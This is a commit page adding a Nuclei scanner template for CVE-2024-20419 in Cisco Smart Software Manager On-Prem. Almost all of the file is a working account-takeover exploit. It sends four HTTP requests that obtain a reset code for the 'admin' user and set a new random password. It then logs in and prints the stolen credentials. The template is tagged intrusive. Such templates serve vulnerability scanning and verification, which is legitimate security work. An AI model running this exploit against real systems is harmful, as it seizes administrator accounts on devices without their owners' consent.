Merge pull request #10680 from projectdiscovery/CVE-2024-20419

Create CVE-2024-20419.yaml
projectdiscovery · Sep 4, 2024 · 217c670 · 217c670
2 parents 691d9dd + 1c43c10
commit 217c670
Showing 1 changed file with 116 additions and 0 deletions.
diff --git a/http/cves/2024/CVE-2024-20419.yaml b/http/cves/2024/CVE-2024-20419.yaml
@@ -0,0 +1,116 @@
+id: CVE-2024-20419
+
+info:
+  name: Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process.
+  impact: |
+    An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.
+  reference:
+    - https://www.0xpolar.com/blog/CVE-2024-20419
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-20419
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
+    - https://www.secpod.com/blog/critical-flaw-in-ciscos-secure-email-gateways-allows-attackers-to-control-the-device-completely/
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2024-20419
+    cwe-id: CWE-620
+    epss-score: 0.00043
+    epss-percentile: 0.09568
+  metadata:
+    fofa-query: title="On-Prem License Workspace"
+    verified: true
+    max-request: 4
+  tags: cve,cve2024,cisco,on-prem,ssm,intrusive,account-takeover
+
+flow: http(1) && http(2) && http(3) && http(4)
+
+variables:
+  username: "admin"
+  string1: "{{to_upper(rand_text_alphanumeric(7))}}"
+  string2: "{{to_lower(rand_text_alphanumeric(7))}}"
+  password: "{{string1}}{{string2}}!"
+
+http:
+  - raw:
+      - |
+        GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - 'enabled'
+          - 'redirect'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /backend/reset_password/generate_code HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}
+
+        {"uid": "admin"}
+
+    matchers:
+      - type: word
+        words:
+          - 'uid'
+          - 'auth_token'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: json
+        part: body
+        name: auth_token
+        json:
+          - ".auth_token"
+        internal: true
+
+  - raw:
+      - |
+        POST /backend/reset_password HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        Content-Type: application/json
+        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}
+
+        {"uid": "admin","auth_token":"{{auth_token}}", "password":"{{password}}","password_confirmation":"{{password}}","common_name":""}
+
+    matchers:
+      - type: word
+        words:
+          - '"status":"OK"'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /backend/auth/identity/callback HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+        X-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}
+        Content-Type: application/json
+
+        {"username":"{{username}}","password":"{{password}}"}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'session_key'
+          - 'role'
+        condition: and
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"USER: "+ username'
+          - '"PASS: "+ password'